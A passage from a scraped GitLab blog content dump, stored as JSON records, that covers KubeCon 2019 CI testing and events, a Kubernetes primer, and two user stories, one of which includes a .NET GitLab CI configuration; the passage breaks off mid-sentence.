pulumi stack init rocore/$ENV-app\n    Logging in using access token from PULUMI_ACCESS_TOKEN\n    Created stack 'rocore/test-96425413-app'\n    $ pulumi config set DOCKER_TAG $DOCKER_TAG\n    $ pulumi config set ENV $ENV\n    $ pulumi config set gcp:project rocore-k8s\n    $ pulumi config set gcp:zone us-west1-a\n    $ pulumi up --skip-preview\n    Updating (rocore/test-96425413-app):\n    ...\n    Resources:\n        + 16 created\n\n    Duration: 4m10s\n\n    Permalink: https://app.pulumi.com/rocore/demo-app/test-96425413-app/updates/1\n    ```\n\n    The `after_script` destroys our stack as well as prints the logs of both our Kubernetes job and deployment, which help with debugging if our tests were to fail. We use the `after_script` to make sure that we always clean up and print logs even when our acceptance tests fail.\n    \n    ```bash\n    ...\n    $ pulumi stack select rocore/$ENV-app\n    $ kubectl logs -n rocore --selector=appClass=$ENV-demo-app-acc-test --tail=200\n    === RUN   TestSimpleHappyPath\n    === RUN   TestSimpleHappyPath/message_is_sent_to_PubSub_topic\n    === RUN   TestSimpleHappyPath/message_is_stored_in_bucket\n    ",[953,1038,9,109,231,277],{"slug":3560,"featured":6,"template":689},"kubecon-na-2019-are-you-about-to-break-prod","content:en-us:blog:kubecon-na-2019-are-you-about-to-break-prod.yml","Kubecon Na 2019 Are You About To Break Prod","en-us/blog/kubecon-na-2019-are-you-about-to-break-prod.yml","en-us/blog/kubecon-na-2019-are-you-about-to-break-prod",{"_path":3566,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3567,"content":3573,"config":3578,"_id":3580,"_type":14,"title":3581,"_source":16,"_file":3582,"_stem":3583,"_extension":19},"/en-us/blog/kubernetes-kubecon-barcelona",{"title":3568,"description":3569,"ogTitle":3568,"ogDescription":3569,"noIndex":6,"ogImage":3570,"ogUrl":3571,"ogSiteName":673,"ogType":674,"canonicalUrls":3571,"schema":3572},"See you at KubeCon Barcelona!","We're excited to see you all in Barcelona! Visit us at booth S21.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664107/Blog/Hero%20Images/tanuki-adventure.png","https://about.gitlab.com/blog/kubernetes-kubecon-barcelona","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"See you at KubeCon Barcelona!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Priyanka Sharma\"}],\n        \"datePublished\": \"2019-05-17\",\n      }",{"title":3568,"description":3569,"authors":3574,"heroImage":3570,"date":3575,"body":3576,"category":10,"tags":3577},[1032],"2019-05-17","\nKubeCon is here again! I am very excited to go to Barcelona and meet (some of) the 12,000 attendees expected at the show. I’ve been part of KubeCon since the second event when there were 700 attendees. That year, we were a cozy community with about five projects, and Kubernetes was the newest game in town. Fast forward to today and I now serve on the board of the CNCF, Kubernetes is a stable technology, the foundation hosts 36 projects, and the latest of them to graduate will be Fluentd (after Kubernetes, Prometheus, CoreDNS, Envoy, and Containerd). I can’t quite reveal it yet, but there will be a very cool GitLab story intertwined with one of the projects that you will see for yourself soon :-).\n\n\u003Cscript type=\"text/javascript\" src=\"https://ssl.gstatic.com/trends_nrtr/1754_RC01/embed_loader.js\">\u003C/script> \u003Cscript type=\"text/javascript\"> trends.embed.renderExploreWidget(\"TIMESERIES\", {\"comparisonItem\":[{\"keyword\":\"kubernetes\",\"geo\":\"\",\"time\":\"today 5-y\"}],\"category\":0,\"property\":\"\"}, {\"exploreQuery\":\"date=today%205-y&q=kubernetes\",\"guestPath\":\"https://trends.google.com:443/trends/embed/\"}); \u003C/script>\n*\u003Csmall>Kubernetes growth over the past 5 years.\u003C/small>*\n\nAs some of you know, I joined GitLab after following the company and our CEO, Sid Sijbrandij, for a long time. Working at this dynamic company has been a ride of a lifetime. I am an open source person and one of the interesting things for me is how the [GitLab story](/company/history/) is similar to the Kubernetes story. GitLab started as an open source git provider because our co-founder, [Dmitriy \"DZ\" Zaphorozhets](/company/team/#dzaporozhets) didn’t like his options. Today, we have morphed into a [single application for the entire DevOps lifecycle](/stages-devops-lifecycle/). Similarly, Kubernetes comes from humble beginnings. In the words of Joe Beda, co-founder of Kubernetes, “there were a set of us that just wanted to be able to hack on some stuff and not have to go through all the process of shipping stuff to Google...it was more important for us to sort of reset the playing field between clouds. And so Kubernetes became a way for us to start doing that.”\n\nIt’s exciting to watch Kubernetes grow into the default container orchestration platform but I believe the best is yet to come: When the technology truly shifts left and every developer has access to it. That’s where GitLab comes in. With it’s deep focus on the developer workflow, the product brings efficiency, collaboration, and governance to teams sprawling the world wide web (a la GitLab itself) or small groups working out of a garage. When everything’s in the MR, everything is accessible including details on your kubernetes pods. I invite you to learn more about how we [integrate with Kubernetes](/solutions/kubernetes/).\n\n> “The only way in my opinion to make it easier for most end users to have a \"cloud-native\" experience is to provide a more end-to-end platform, a way that people can come together and they can edit code and review code and then actually do CI on that code and get that code shipped out to containers and have it be run with appropriate load balancing and observability.” — Matt Klein, Systems Engineer at Lyft\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/w0cZuG2Fcwo\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n*\u003Csmall>Video directed and produced by [Aricka Flowers](/company/team/#arickaflowers).\u003C/small>*\n\n## Let's connect!\n\n[Meet us at booth S21](https://about.gitlab.com/events/kubecon/) for CI office hours, tanuki adventures, and iPad giveaways!\n\nI'd love to help any CNCF projects (and other folks!) consider [GitLab CI](/solutions/continuous-integration/). If you are interested, [DM me on Twitter](https://twitter.com/pritianka) and we can sit down and discuss.\n\n## Join us for these events\n\n### Monday, May 20\n\n#### Cloud-Native Transformation Summit Hosted by Sysdig | 9:00 am - 12:15 pm\n\nJoin Priyanka Sharma, Director of Technical Evangelism at GitLab, at this zero day KubeCon event. This event will look at how enterprise organizations are moving into production-level Kubernetes and transforming their applications and infrastructure operations into Cloud-Native technologies.\n[Learn more here](https://go.sysdig.com/cloud_native_transformation_summit_2019.html).\n\n#### Zero Trust in the Cloud Native Era at Cloud Native Security Day | 11:00 - 11:30 am\n\nPriyanka Sharma, Director of Technical Evangelism at GitLab covers zero trust in the era of cloud native. [Register here](https://go.twistlock.com/cloudnativesecurityday#agenda).\n\n#### The Future of CI/CD with Kubernetes | 2:40 - 3:20 pm\n\nJoin Dan Lorenc, Software Engineer at Google, Carlos Sanchez, Principal Software Engineer at CloudBees, and Priyanka Sharma, Director of Technical Evangelism at GitLab, and Rob Zuber, CTO at CircleCI for a discussion on the future of CI/CD with Kubernetes.[Learn more here](https://sched.co/N6FQ).\n\n#### Barcelona Free Software Meetup: Working in the Open with GitLab, Kubic with openSUSE | 7-9 pm\n\nJoin Jason Plum, a Senior Software Engineer, Distribution at GitLab, for a talk on GitLab’s open-core product. He’ll discuss contributing back to the community directly, as well as sharing insights on changing from Closed to Open.\n[RSVP here](https://www.meetup.com/Barcelona-Free-Software/events/260656266/).\n\n### Tuesday, May 21\n\n#### Tutorial: Cloud-Agnostic Serverless - Sebastien Goasguen, TriggerMesh & Priyanka Sharma, GitLab | 11:05 am - 12:30 pm\n\nIn this tutorial, we will leverage Knative, Google's Kubernetes-based open source platform to build, deploy, and manage modern serverless workloads. We will push serverless functions and apps to production on any cloud of choice and switch the provider as necessary. We will leverage GitLab and TriggerMesh technology in the tutorial and also share how developers can use other options.\nSign up for the tutorial through the KubeCon schedule [here](https://sched.co/MPgx).\n\n#### Multicloud 360 Event | 8:30 pm - Midnight\n\nJoin GitLab, Upbound, DigitalOcean, Google Cloud and CockroachDB for 360 views of Barcelona and a discussion of multicloud. [RSVP here](https://www.eventbrite.com/e/multicloud-360-tickets-60623662005) to reserve your spot.\n\n### Wednesday, May 22\n\n#### The Serverless Landscape and Event Driven Futures - Dee Kumar, Linux Foundation & Priyanka Sharma, GitLab | 2:00 -2:35 pm\n\nThere is a lot of curiosity and confusion around [serverless computing](/topics/serverless/). What is it? Who is it for? Is it a replacement for IaaS, PaaS, and containers? Does that mean the days of servers are over? The CNCF created the Serverless Working Group to explore the intersection of cloud native and serverless technology. [Learn more here](https://sched.co/MPeI).\n\n## Play #tanukiadventure\n\nJoin our #tanukiadventure! Grab your game card at our booth S21 to help guide your adventure in finding GitLab's partners. At each adventure stop, learn how they work with GitLab! Once complete, each partner will provide you with an exclusive GitLab collectible pin to celebrate our awesome partnership! The first 50 attendees to collect all 8 unique Tanuki pins will win our prized GitLab Tanuki hoodie!\n",[909,845,277,1038,9],{"slug":3579,"featured":6,"template":689},"kubernetes-kubecon-barcelona","content:en-us:blog:kubernetes-kubecon-barcelona.yml","Kubernetes Kubecon Barcelona","en-us/blog/kubernetes-kubecon-barcelona.yml","en-us/blog/kubernetes-kubecon-barcelona",{"_path":3585,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3586,"content":3592,"config":3599,"_id":3601,"_type":14,"title":3602,"_source":16,"_file":3603,"_stem":3604,"_extension":19},"/en-us/blog/kubernetes-the-container-orchestration-solution",{"title":3587,"description":3588,"ogTitle":3587,"ogDescription":3588,"noIndex":6,"ogImage":3589,"ogUrl":3590,"ogSiteName":673,"ogType":674,"canonicalUrls":3590,"schema":3591},"Kubernetes: Get to know the container orchestration solution","Kubernetes, also known as K8s, is a must-have solution for deploying and maintaining applications, especially in the cloud. Learn the basics of Kubernetes with this introductory guide.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749660215/Blog/Hero%20Images/kubernetes-container-orchestration-solution.jpg","https://about.gitlab.com/blog/kubernetes-the-container-orchestration-solution","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Kubernetes: Get to know the container orchestration solution\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab Team\"}],\n        \"datePublished\": \"2024-07-25\",\n      }",{"title":3587,"description":3588,"authors":3593,"heroImage":3589,"date":3595,"body":3596,"category":10,"tags":3597,"updatedDate":3598},[3594],"GitLab Team","2024-07-25","Kubernetes automates the tasks of deploying and managing containerized applications on a large scale. Over time, Kubernetes has become an essential tool for developing applications in many areas, such as [microservices](https://about.gitlab.com/topics/microservices/), web applications, and databases. Its performance and scalability make it a recognized standard in container management today.\n\nDiscover everything you need to know about Kubernetes in this article.\n\n## What is Kubernetes?\n\nKubernetes is an open-source system for efficiently orchestrating the containers of a software application. Containerization is a widely acclaimed approach to developing applications, especially in the areas of digital transformation and the cloud.\n\nIf you're not familiar with the concept of containers, note that it is an application development method that groups the components of an application into standardized units – or containers – that are independent of the devices and operating systems they are located on. By isolating applications from their environment, this technology facilitates their deployment and portability, as well as reduces interoperability conflicts.\n\nThis is where we use the Kubernetes software. Certainly, containers allow applications to be divided into smaller and autonomous modules, thus facilitating their deployment. However, for containers to interact within an application, a management system encompassing these modules is necessary. That's exactly what Kubernetes does. Kubernetes provides a platform to control where and how containers run, so you can orchestrate and schedule their execution to manage containerized applications on a large scale.\n\n> Browse [GitLab articles about Kubernetes](https://about.gitlab.com/blog/tags/kubernetes/).\n\n## How does a Kubernetes architecture work?\n\nTo understand how a Kubernetes architecture works, it is essential to become familiar with certain concepts, starting with that of the cluster, which is the most extensive within the architecture. A Kubernetes cluster is defined as the set of virtual or physical machines on which a containerized application is installed.\n\n![Components of Kubernetes](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673941/Blog/Content%20Images/components-of-kubernetes.png)\n\nSource: [Kubernetes](https://kubernetes.io/docs/concepts/overview/components/).\n\nThis cluster comprises different elements:\n- Node: This is a work unit in a Kubernetes cluster. It is a virtual or physical machine that performs tasks on behalf of the application.\n- Pod: A pod is the smallest deployable unit in Kubernetes. It is a group of containers working together on the same node. Containers inside a pod share the same network and can communicate with each other via localhost.\n- Service: A Kubernetes service exposes a pod to the network or other pods. It offers a stable and well-defined access point to applications hosted by pods.\n- Volume: A folder abstraction that solves problems of sharing and retrieving files within a container.\n- Namespace: A namespace allows you to group and isolate resources to form a virtual cluster.\n\nThe Kubernetes architecture is based on two main types of nodes: the master node and the worker nodes. The master node is responsible for the overall management of the Kubernetes cluster and communication with the worker nodes. Among its key components, the API is the central point of contact for all communications between users and the cluster. The [etcd](https://kubernetes.io/docs/concepts/overview/components/#etcd) is the key-value database where the configurations, the system state and the object metadata, are stored. The controller manager coordinates background operations such as pod replication, and the scheduler places pods on nodes based on available resources.\n\nWorker nodes, on the other hand, are the machines that run and manage the applications contained in the pods. Within them, the [kubelet](https://kubernetes.io/docs/concepts/overview/components/#kubelet) is the agent that runs on each node and communicates with the master to receive the commands and transmit the status of the pods. The network proxy or [kube-proxy](https://kubernetes.io/docs/concepts/overview/components/) maintains network rules on nodes to allow access to services from outside the Kubernetes cluster. Finally, the container runtime is the software responsible for the execution and management of containers within the pods.\n\n### Docker's role\n\nAmong all the components of a K8s cluster, the choice of runtime within the worker nodes is important. Different software is available for this, such as rkt or CRI-O, but Docker is the most commonly used tool.\n\n### What is the difference between Docker and Kubernetes?\n\nDocker is an open-source solution that is specifically used at the container level. It allows containers to be packaged in a standardized and lightweight format, which increases their portability in different environments. It is therefore a complementary tool to K8s that facilitates the management of containers themselves, while Kubernetes simplifies their integration and communication within the application.\n\n## What are the benefits of Kubernetes?\n\nLaunched by Google in 2014, the first stable version of Kubernetes appeared in July 2015. Since then, the popularity of this software has not wavered, making K8s a benchmark in the field of container orchestration, especially for microservice-oriented architectures. So then, why use Kubernetes? This success is primarily due to the excellent performance of this software in container orchestration.\n\nThe benefits of Kubernetes are plenty, as follows:\n- Automation: Kubernetes facilitates the automation of tasks related to the deployment, scaling, and updating of containerized applications.\n- Flexibility: The software adapts to different container technologies, as well as various hardware architectures and operating systems.\n- Scalability: K8s facilitates the deployment and management of thousands of containers, regardless of their status: running, paused, or stopped.\n- Migration: It is possible to easily migrate applications to Kubernetes without having to change the source code.\n- Multi-cluster support: Kubernetes centrally manages multiple container clusters distributed across different infrastructures.\n- Update management: The software supports rolling update deployments to update applications without service disruption.\n\n## A robust and scalable ecosystem\n\nKubernetes stands out for its ability to manage containers efficiently and securely, while maintaining its independence from cloud infrastructure providers. Its modular architecture adapts to the specific needs of each company and supports a very wide range of applications and services (web services, data processing, mobile applications, etc.).\n\nIn the race for digital transformation, Kubernetes also wins over people, thanks to its rich and scalable ecosystem within the open-source community. Managed by the Cloud Native Computing Foundation ([CNCF](https://www.cncf.io/)), K8s is supported by thousands of developers around the world. They contribute to the development of the project and the continuous improvement of its features.\n\n## What are the limitations of Kubernetes?\n\nThe benefits of Kubernetes make it a safe choice for many development teams in the cloud-native application space. Nevertheless, it is worth pointing out some of its limitations. Kubernetes requires a solid technical background and training in new development concepts and methods. The software can be complex to configure at the beginning of a project. However, configuration is crucial, especially to secure the platform. Having an experienced development team for K8s projects is therefore a significant asset.\n\nAnother challenge is the implementation and maintenance of a K8s architecture, which also requires time and resources, especially to update its various components and software. This raises the question of possible oversizing. In the case of a small application, or a project with no particular challenge in terms of scalability, a more basic architecture may suffice while being more economical.\n\n## Using Kubernetes within your teams\n\nTens of thousands of companies have adopted a Kubernetes architecture to carry out their digital transition. K8s is used by companies of all sizes, from startups to multinationals.\n\nThere are many examples of successful integrations, such as for Haven Technologies. Haven Technologies has migrated its SaaS services to K8s and relies in particular on a Kubernetes strategy with the GitLab DevSecOps platform to help its teams improve efficiency, security, and speed of software development. Check out [our client story](https://about.gitlab.com/customers/haven-technologies/) to learn more!\n\n## Kubernetes, Git, and GitLab\n\nKubernetes, Git, and GitLab are essential elements of the DevOps landscape. Kubernetes offers great flexibility to deploy and manage the various components of an application, while GitLab, which is built around Git and its native version control system, allows rigorous and accurate tracking of source code and changes, while providing a comprehensive suite of tools to manage the entire software development lifecycle.\n\nThis combination, together with a [GitOps approach](https://about.gitlab.com/topics/gitops/), which aims to automate the provisioning of modern cloud infrastructures, creates an agile environment for application development and deployment, thus making it possible to provide powerful, flexible, and scalable software. For more details, discover all [GitLab solutions to launch an application with Kubernetes](https://about.gitlab.com/solutions/kubernetes/).\n\n## Kubernetes FAQ\n### What are the competing solutions to K8s?\n\nThere are several alternatives to Kubernetes, including Docker Swarm, and Marathon. However, Kubernetes is considered the most mature and popular solution on the market. Its broad user base, abundant documentation, and active community support make Kubernetes an excellent choice for those looking to adopt a container orchestration system.\n\n### What is a Kubernetes cluster?\n\nA Kubernetes cluster is composed of a master node and several worker nodes. The master node is responsible for coordinating the tasks in the cluster, while the worker nodes execute these orchestration tasks and host the containers. K8s clusters are highly scalable – nodes can be added or removed to adapt cluster resources to the needs of the application.\n\n### How to get started with Kubernetes?\n\nTo begin, it is necessary to install the Kubernetes software on a compatible environment (Linux, macOS, or Windows). Kubernetes can be installed in a traditional hosting environment, but also in a cloud environment (Google Kubernetes Engine or Amazon EKS, for example). Users can download and install Kubernetes directly from their official site, and then proceed with the initial configuration necessary to connect the master and worker nodes. Once this step is completed, users are ready to deploy a first application using Kubernetes.\n\n### Why choose Kubernetes?\n\nKubernetes offers great flexibility and total portability between different cloud platforms or on-site infrastructures. By automating orchestration tasks, K8s helps to optimize resources, reduce operating costs, and free up time for developers and system administrators. Finally, the Kubernetes ecosystem is vast and is continuously developed by a large open-source community, enabling rapid innovation.\n\n## Learn more\n\n- [How to stream logs through the GitLab Dashboard for Kubernetes](https://about.gitlab.com/blog/how-to-stream-logs-through-the-gitlab-dashboard-for-kubernetes/)\n- [Kubernetes overview: Operate cluster data on the frontend](https://about.gitlab.com/blog/kubernetes-overview-operate-cluster-data-on-the-frontend/)\n- [Simplify your cloud account management for Kubernetes access](https://about.gitlab.com/blog/simplify-your-cloud-account-management-for-kubernetes-access/)\n",[1038,9],"2024-08-22",{"slug":3600,"featured":6,"template":689},"kubernetes-the-container-orchestration-solution","content:en-us:blog:kubernetes-the-container-orchestration-solution.yml","Kubernetes The Container Orchestration Solution","en-us/blog/kubernetes-the-container-orchestration-solution.yml","en-us/blog/kubernetes-the-container-orchestration-solution",{"_path":3606,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3607,"content":3613,"config":3619,"_id":3621,"_type":14,"title":3622,"_source":16,"_file":3623,"_stem":3624,"_extension":19},"/en-us/blog/leah-petersen-user-spotlight",{"title":3608,"description":3609,"ogTitle":3608,"ogDescription":3609,"noIndex":6,"ogImage":3610,"ogUrl":3611,"ogSiteName":673,"ogType":674,"canonicalUrls":3611,"schema":3612},"From motorcycle stunter to DevOps: Finding love for CI/CD","Switching to GitLab helped a newly minted DevOps engineer grasp the concept of CI/CD.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663760/Blog/Hero%20Images/image-for-leah-post.jpg","https://about.gitlab.com/blog/leah-petersen-user-spotlight","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Motorcycle stunter turned DevOps engineer says GitLab helped her learn to \"love\" CI/CD\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2018-06-21\",\n      }",{"title":3614,"description":3609,"authors":3615,"heroImage":3610,"date":3616,"body":3617,"category":682,"tags":3618},"Motorcycle stunter turned DevOps engineer says GitLab helped her learn to \"love\" CI/CD",[2071],"2018-06-21","\nWhen professional motorcycle stuntwoman turned developer Leah Petersen switched from Jenkins to GitLab, she was a bit nervous to say the least. Having only worked in tech for nine months, the [Samsung SDS](https://www.samsungsds.com/us/en/index.html) engineer was not enthused about the prospect of having to learn a new application after feeling like she had “just started to get competent” with Jenkins.\n\nAfter a self-described mini pity party, she dove into GitLab head first, jumping into a few big ticket projects to get a handle on the landscape. Within a few short months, Petersen was so impressed by her GitLab CI/CD experience that she felt the need to shout her newfound “love” for continuous integration and continuous delivery from the virtual mountaintop of [her blog](https://leahnp.github.io/2018/moving-from-jenkins-to-gitlab-CI/).\n\nWe recently met up with Petersen to learn more about her transition to the tech world and experience with GitLab.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/Avx_RftRT_o\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n### Q & A with Leah Petersen, DevOps Engineer\n\n**Where do you work and what does your team do?**\n\nI work for a team in Samsung SDS called the Cloud Native Computing Team, and I'm [a DevOps engineer](https://about.gitlab.com/topics/devops/what-is-a-devops-engineer/). We deal primarily with containers in Kubernetes and helping companies modernize and move to the cloud. My team is super unique. We were kind of treated like an incubated startup within Samsung, so we're really given a lot of autonomy to make our own decisions.\n\nOur team was put together about five years ago, and Samsung really made a bet on Kubernetes being the future of orchestrating huge workloads in the cloud. Initially, we were focusing mainly on research and development, contributing to the Kubernetes community and learning who was a part of it, what their motives were, and how we could find our place in it. Over the last year, Samsung has really pivoted our role in the company, and we're looking at how we can help Samsung as a global organization move to Kubernetes and containers.\n\n**Where did you work before Samsung?**\n\nI was a motorcycle stunt rider before I became an engineer, and that career kind of organically grew out of my passion for motorcycles. I started stunting, loved the community and was able to meet people all over the country and travel. Being one of the few women who did it, I organically started getting calls for jobs and gigs. I thought, “If I can do this in my 20s and make this my full-time career, I'm definitely going to take a shot at it,” so I did.\n\nIt was an amazing opportunity and experience to travel the world and meet people all over this planet who are passionate about this crazy thing that I'm also passionate about. And I got to work with a lot of amazing brands and raise awareness about the sport that I love. So, I don't have any regrets about that and cherish the time that I got to spend on a motorcycle professionally.\n\n**How did you move from being a professional motorcycle stunter to a DevOps engineer?**\n\nI had been looking for a new career path and wasn't really sure what I was going to do. I knew that I wanted to build some tangible skills. I wanted skills that had a clear market value, and tech definitely provides that.\n\nI ended up taking an online coding course in Python, and had this “aha” moment where I realized, not only can I do this, which I didn't think was previously possible, but it's fun; I really like solving these problems. At that point I started taking more online courses and learning as much as I could for free. Then I ended up finding [Ada Developers Academy](https://www.adadevelopersacademy.org/), and that was the perfect segue into the industry.\n\n> I had this “aha” moment where I realized, not only can I do this, which I didn't think was previously possible, but it's fun\n\n**Can you describe how your experience has been as woman in tech?**\n\nYou definitely get a lot of strange reactions being a woman in tech. Walking into a situation, oftentimes people are surprised you're an engineer. You'll get reactions like, “Oh, I thought you were a project manager,” or, “I thought you were a recruiter,” or whatever other stereotype that you brought into the room. That can be discouraging and makes you feel unwelcome in that space. But I think we need women in every part of tech: frontend, backend, DevOps, operations, everything. If your interest is in UX, go for that. But don't let all the men who've been in the industry for 25 years on the operations side of things scare you off either. I really think we need diverse minds and approaches to problems in the whole spectrum of it.\n\nSometimes I forget about the gender disparity in tech because my team, specifically, has a couple of really amazing women who I get to work with every day. So, I'm very fortunate. But I recently went to KubeCon in Copenhagen, and it's a amazing conference with so much energy, but it's a real wake up call when you see the gender disparity there. There's 4,000 guys walking around and you feel like you stick out [or] when you're sitting in an auditorium, look around and realize, “Oh, I'm the only lady here.” It's something that you can't look away from.\n\n**Why did you decide to go into DevOps engineering?**\n\nIn my boot camp classes we were focusing on web development and building Ruby on Rails and Node.js apps. We each had an opportunity to do an internship at companies in Seattle that support the Ada program. Samsung was one of them, and they came in to do a presentation about their involvement in open source and Kubernetes. I had no idea what they were talking about, but Kubernetes and the momentum of the open source community was really appealing to me. So I took a chance and picked Samsung, dove right in, and found my way as I went along. I'm really happy that I chose Kubernetes and to specialize in the cloud.\n\n>Kubernetes and the momentum of the open source community was really appealing to me. So I took a chance, dove right in, and found my way as I went along\n\n**How did you get started with GitLab CI/CD? And how would you describe your transition to the application?**\n\nI always felt like I was fighting with the CI platform we were on prior to GitLab. It was never really functioning how we wanted it to, and something was always kind of failing. The whole reason you have CI/CD is to get visibility into what's happening with your code, right? You want to run your code through this pipeline and make sure there are no bugs, that you’re packaging it correctly and putting it in the places that you need it to be in production. It's this hugely critical component of going from the developer's computer to the world; that's the pipeline. So you really need the visibility to see what is happening every step of the way.\n\nOn the old system, I felt that I just didn't have that visibility. I was digging for the problems and not able to understand where they were coming from, where they were originating from, why they were happening or how to fix them. I feel like GitLab definitely does a great job of assisting the user in finding the origin of a problem, tracing that step back and making it clear where your issues are and when you're having success.\n\n**How has using GitLab impacted your career and workflow?**\n\nThere's a lot of talk about accessibility and user experience in tech. And we all know what it's like to have a bad user experience with a piece of technology; it's the most frustrating thing in the entire world. As a developer, you deal with lots of different tech every single day. When I started using GitLab about a year and a half into my career, it was certainly the first platform where I was like, ‘I feel so at home here. Everything’s fluid. I can find where everything is. I understand what everything is.’ There aren't these big black holes of confusion that have me asking, “Why does this exist and what am I doing here?’”\n\nWith GitLab, everything is just this cheery, happy place. And I really appreciate how it has now set the bar for me when it comes to the way in which a technology should function when I’m working with it.\n\nCover photo by [Rendiansyah Nugroho](https://unsplash.com/photos/JUePy_-uOSI) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1078,1038,845,9,779,267,685,910],{"slug":3620,"featured":6,"template":689},"leah-petersen-user-spotlight","content:en-us:blog:leah-petersen-user-spotlight.yml","Leah Petersen User Spotlight","en-us/blog/leah-petersen-user-spotlight.yml","en-us/blog/leah-petersen-user-spotlight",{"_path":3626,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3627,"content":3633,"config":3638,"_id":3640,"_type":14,"title":3641,"_source":16,"_file":3642,"_stem":3643,"_extension":19},"/en-us/blog/lee-tickett-my-gitlab-journey",{"title":3628,"description":3629,"ogTitle":3628,"ogDescription":3629,"noIndex":6,"ogImage":3630,"ogUrl":3631,"ogSiteName":673,"ogType":674,"canonicalUrls":3631,"schema":3632},"From user, to advocate, to contributor: my GitLab journey","Three years (as a user and as a contributor) with GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681735/Blog/Hero%20Images/cover_photo.jpg","https://about.gitlab.com/blog/lee-tickett-my-gitlab-journey","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"From user, to advocate, to contributor: my GitLab journey\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lee Tickett\"}],\n        \"datePublished\": \"2020-11-13\",\n      }",{"title":3628,"description":3629,"authors":3634,"heroImage":3630,"date":3635,"body":3636,"category":951,"tags":3637},[3284],"2020-11-13","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nI have had a passion for technology since before I can remember. Thirteen years ago I took the plunge, quit my day job, and started an IT development and support company called [Tickett Enterprises Limited](https://www.tickett.net). For the last three years, GitLab has been a part of my journey.\n\n## 3 Years Ago \nWe were (and still are) using a helpdesk system we built ourselves. It does exactly what we need it to do - and any time it doesn’t, we change it. The most important feature of the system is reporting. Specifically, facilitating our monthly billing process; with a click of a button, we generate timesheets and invoices for all of our clients.\n\nThough I was aware of Git (and GitHub), I had not heard of GitLab. We were using SVN in its most basic form (single repository for all projects and no branching), with an integration so all commits would create notes in our helpdesk.\n\n## 2.5 Years Ago\nWe decided that SVN was no longer fit for purpose. Our top issues were: \n* never knowing whether the code in our repository matched what was deployed\n* not being able to work collaboratively on projects\n* feature/knowledge limitations\n* Git was the industry standard \n\nWhile most of these issues were due to the way we were using SVN, we were keen to adopt a more popular system. I don’t remember how I found GitLab, but I did, and spun up a local on-prem instance of Community Edition (CE) using separate projects/repositories and basic branching. If you are considering running a local instance, I recommend the [Bitnami appliance/.ova](https://bitnami.com/stack/gitlab).\n\nIt took some time to get used to local vs remote and to remember to push as well as commit, but we picked it up pretty quickly.\n\n## 2 Years Ago\nWe wanted to use GitLab to help us improve our processes so we:\n* built a little UI for project creation (using the GitLab API). This ensures new projects fit our naming standards, contain our standard template files, have our standard master/test/dev branches, contain the relevant members, and use our webhooks\n* recreated the helpdesk integration we had with SVN (every commit and comment is replicated as a note on our helpdesk)\n* unaware of GitLab EE, we created a custom merge request approval process using webhooks. Our master branch is always protected - a merge request requires 2 approvals from 2 distinct reviewers (one for code and one for functionality)\n\n## 1.5 Years Ago\nA bit late to the party, but finally we set up the GitLab runner to automate our build, spin up our database, execute our unit tests and report test details and code coverage. GitLab CI for .NET was not as well documented as other use cases leading to a lot of trial and error when setting up the runner.\n\nWe are using the Windows runner configured to use a standard shell (which I think is no longer supported). We will either be moving to powershell on windows or possibly using docker images. Here’s a sample .gitlab-ci.yml\n\n```yml\nstages:\n  - build\n  - test\n\nvariables:\n  CI_DEBUG_TRACE: \"false\"\n  ASSEMBLY_VERSION: \"1.0.4\"\n  \nbuild:\n stage: build\n script:\n  - 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nuget restore'\n  - '\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\BuildTools\\MSBuild\\15.0\\bin\\msbuild\" /t:Restore,Clean,ReBuild /t:Database:Publish /p:Configuration=Debug;Platform=\"Any CPU\" /p:SqlPublishProfilePath=Database.publish.xml'\n  - 'ping 192.168.99.99 -n 1 -w 10000 2>nul || type nul>nul'\n artifacts:\n  paths:\n   - Tests/bin/\n\ntest:\n stage: test\n script:\n  - 'c:\\GitLab-Runner\\opencover\\OpenCover.Console.exe -returntargetcode:1000 -filter:\"+[*]* -[nunit*]* -[*Tests*]*\" -register -target:\"C:\\Program Files (x86)\\NUnit.org\\nunit-console\\nunit3-console.exe\" -targetargs:\"Tests\\Tests.csproj --result=testresult.xml;transform=C:\\gitlab-runner\\nunit3-junit.xslt\"'\n coverage: '/^Visited Branches .*(\\(\\d+\\.?\\d*\\))/'\n dependencies:\n  - build\n artifacts:\n  reports:\n   junit: testresult.xml\n```\n\nWe were building another customization to allow us to search for code across all repositories. Unfortunately, we hit a limitation because the API did not allow searching anything but the default branch.\n\nAt this point, while Googling for help getting CI up and running, I learned that GitLab is open-source. So I thought maybe I could extend the API to support searching any branch. This lead to [my first contribution](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/28069).\n\n## 1 Year Ago\nAt this point, I was completely new to all of the technologies, techniques, and best practices used by GitLab but found myself participating in my first [GitLab 